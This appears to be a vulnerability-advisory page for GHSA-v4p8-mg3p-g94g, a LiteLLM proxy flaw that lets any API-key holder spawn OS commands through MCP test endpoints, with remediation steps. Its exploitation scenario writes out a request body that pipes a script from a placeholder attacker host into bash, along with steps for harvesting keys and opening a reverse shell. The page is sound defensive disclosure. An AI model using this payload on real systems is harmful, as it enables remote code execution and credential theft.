GHSA-v4p8-mg3p-g94g: LiteLLM RCE — HIGH

CISO Take

LiteLLM's proxy exposes two MCP server test endpoints that accept arbitrary stdio command configurations—including the `command`, `args`, and `env` fields—and spawn them as subprocesses on the host without any role check. The flaw is gated only by a valid proxy API key, meaning any holder of a low-privilege internal-user key can achieve full OS command execution with the privileges of the litellm process. With litellm carrying a package risk score of 79/100, 19 historical CVEs in the same package, and an OpenSSF score of just 6.5/10, this is not an isolated slip—it's a pattern in a high-value AI infrastructure component. Upgrade immediately to 1.83.7; if patching is blocked, add WAF rules to block POST requests to `/mcp-rest/test/connection` and `/mcp-rest/test/tools/list` at your reverse proxy.

Sources: GitHub Advisory ATLAS OpenSSF

What is the risk?

HIGH. Exploitation requires only a valid (any-privilege) litellm API key and a single crafted POST request—no AI/ML knowledge needed. The blast radius is the entire proxy host: litellm proxies routinely hold API keys for multiple LLM providers (OpenAI, Anthropic, etc.) in their environment, making them high-value pivot points. No public exploit has been confirmed, but the attack is trivial to reconstruct from the advisory description alone. The absence of EPSS data should not be read as low risk; the low exploitation complexity and high-value deployment context push this firmly into critical operational territory.

How does the attack unfold?

Initial Access

Attacker obtains any valid litellm proxy API key—via leaked CI/CD secrets, misconfigured `.env`, or as a legitimate low-privilege internal user.

AML.T0012

Exploitation

Attacker sends a crafted POST to `/mcp-rest/test/connection` with `{"transport":"stdio","command":"/bin/bash","args":["-c","<payload>"]}` using their API key; litellm accepts the request without role verification.

AML.T0049

Command Execution

LiteLLM spawns the attacker-supplied command as a subprocess on the proxy host with the process's OS privileges, achieving arbitrary remote code execution.

AML.T0050

Credential Harvesting & Impact

Attacker reads litellm's environment to exfiltrate all stored LLM provider API keys (OpenAI, Anthropic, etc.), then establishes persistence or pivots to internal AI infrastructure.

AML.T0083

Initial Access

Attacker obtains any valid litellm proxy API key—via leaked CI/CD secrets, misconfigured `.env`, or as a legitimate low-privilege internal user.

AML.T0012

Exploitation

Attacker sends a crafted POST to `/mcp-rest/test/connection` with `{"transport":"stdio","command":"/bin/bash","args":["-c","<payload>"]}` using their API key; litellm accepts the request without role verification.

AML.T0049

Command Execution

LiteLLM spawns the attacker-supplied command as a subprocess on the proxy host with the process's OS privileges, achieving arbitrary remote code execution.

AML.T0050

Credential Harvesting & Impact

Attacker reads litellm's environment to exfiltrate all stored LLM provider API keys (OpenAI, Anthropic, etc.), then establishes persistence or pivots to internal AI infrastructure.

AML.T0083

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
LiteLLM	pip	>= 1.74.2, < 1.83.7	`1.83.7`
51.0K OpenSSF 6.1 6 dependents Pushed 3d ago 44% patched ~38d to patch Full package profile →

Do you use LiteLLM? You're affected.

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What should I do?

6 steps

Patch

Upgrade litellm to >= 1.83.7 immediately. The fix enforces PROXY_ADMIN role on both test endpoints, matching the save endpoint's existing access control.
Workaround (if patching is delayed): Block POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list at your reverse proxy, API gateway, or WAF.
Audit

Review litellm access logs for calls to these endpoints going back to when you deployed >= 1.74.2—any hit is suspicious.
Key rotation

Rotate all LLM provider API keys stored in litellm's environment if exploitation cannot be ruled out.
Least privilege

Audit which users hold internal-user vs. PROXY_ADMIN keys and revoke excess access.
Detection

Alert on any subprocess spawning by the litellm process that isn't in a known-good allowlist.

How is it classified?

Auth Bypass Code Execution API Inference AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0083 - Credentials from AI Agent Configuration

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.3 - Security of AI systems

NIST AI RMF

GOVERN-1.7 - Processes and procedures for AI risk identification and management

OWASP LLM Top 10

LLM07 - Insecure Plugin Design LLM08 - Excessive Agency

Frequently Asked Questions

What is GHSA-v4p8-mg3p-g94g?

LiteLLM's proxy exposes two MCP server test endpoints that accept arbitrary stdio command configurations—including the `command`, `args`, and `env` fields—and spawn them as subprocesses on the host without any role check. The flaw is gated only by a valid proxy API key, meaning any holder of a low-privilege internal-user key can achieve full OS command execution with the privileges of the litellm process. With litellm carrying a package risk score of 79/100, 19 historical CVEs in the same package, and an OpenSSF score of just 6.5/10, this is not an isolated slip—it's a pattern in a high-value AI infrastructure component. Upgrade immediately to 1.83.7; if patching is blocked, add WAF rules to block POST requests to `/mcp-rest/test/connection` and `/mcp-rest/test/tools/list` at your reverse proxy.

Is GHSA-v4p8-mg3p-g94g actively exploited?

No confirmed active exploitation of GHSA-v4p8-mg3p-g94g has been reported, but organizations should still patch proactively.

How to fix GHSA-v4p8-mg3p-g94g?

1. **Patch**: Upgrade litellm to >= 1.83.7 immediately. The fix enforces `PROXY_ADMIN` role on both test endpoints, matching the save endpoint's existing access control. 2. **Workaround** (if patching is delayed): Block `POST /mcp-rest/test/connection` and `POST /mcp-rest/test/tools/list` at your reverse proxy, API gateway, or WAF. 3. **Audit**: Review litellm access logs for calls to these endpoints going back to when you deployed >= 1.74.2—any hit is suspicious. 4. **Key rotation**: Rotate all LLM provider API keys stored in litellm's environment if exploitation cannot be ruled out. 5. **Least privilege**: Audit which users hold internal-user vs. PROXY_ADMIN keys and revoke excess access. 6. **Detection**: Alert on any subprocess spawning by the litellm process that isn't in a known-good allowlist.

What systems are affected by GHSA-v4p8-mg3p-g94g?

This vulnerability affects the following AI/ML architecture patterns: LLM proxy/gateway deployments, MCP server integrations, Multi-tenant AI platforms, Agent frameworks using litellm as router, RAG pipelines with centralized LLM access.

What is the CVSS score for GHSA-v4p8-mg3p-g94g?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

LLM proxy/gateway deploymentsMCP server integrationsMulti-tenant AI platformsAgent frameworks using litellm as routerRAG pipelines with centralized LLM access

MITRE ATLAS Techniques

AML.T0012 Valid Accounts

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0053 AI Agent Tool Invocation

AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.6.2.3

NIST AI RMF: GOVERN-1.7

OWASP LLM Top 10: LLM07, LLM08

What are the technical details?

Original Advisory

### Impact Two endpoints used to preview an MCP server before saving it — `POST /mcp-rest/test/connection` and `POST /mcp-rest/test/tools/list` — accepted a full server configuration in the request body, including the `command`, `args`, and `env` fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process. The endpoints were gated only by a valid proxy API key, with no role check. Any authenticated user — including holders of low-privilege internal-user keys — could therefore run arbitrary commands on the host. ### Patches Fixed in **`1.83.7`**. Both test endpoints now require the `PROXY_ADMIN` role, bringing them into line with the save endpoint. ### Workarounds If upgrading is not immediately possible, developers should block `POST /mcp-rest/test/connection` and `POST /mcp-rest/test/tools/list` at their reverse proxy or API gateway.

Exploitation Scenario

An internal developer with a low-privilege litellm API key—or an external attacker who harvested one from a leaked `.env` file or misconfigured CI pipeline—sends a single POST to `/mcp-rest/test/connection` with body `{"transport": "stdio", "command": "/bin/bash", "args": ["-c", "curl https://attacker.com/implant.sh | bash"]}`. LiteLLM's MCP preview logic accepts the configuration and spawns the supplied command as a subprocess under the proxy process's OS privileges. The attacker's implant immediately reads `/proc/1/environ` or the application's `.env` to harvest LLM API keys (OpenAI, Anthropic, Cohere, etc.), exfiltrates them to a C2, then establishes a reverse shell for persistent access. From the proxy host, the attacker can intercept and manipulate all LLM traffic, inject malicious responses into downstream agent workflows, or pivot to internal model-serving endpoints that are not internet-exposed.

Weaknesses (CWE)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Primary

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

[Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
[Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.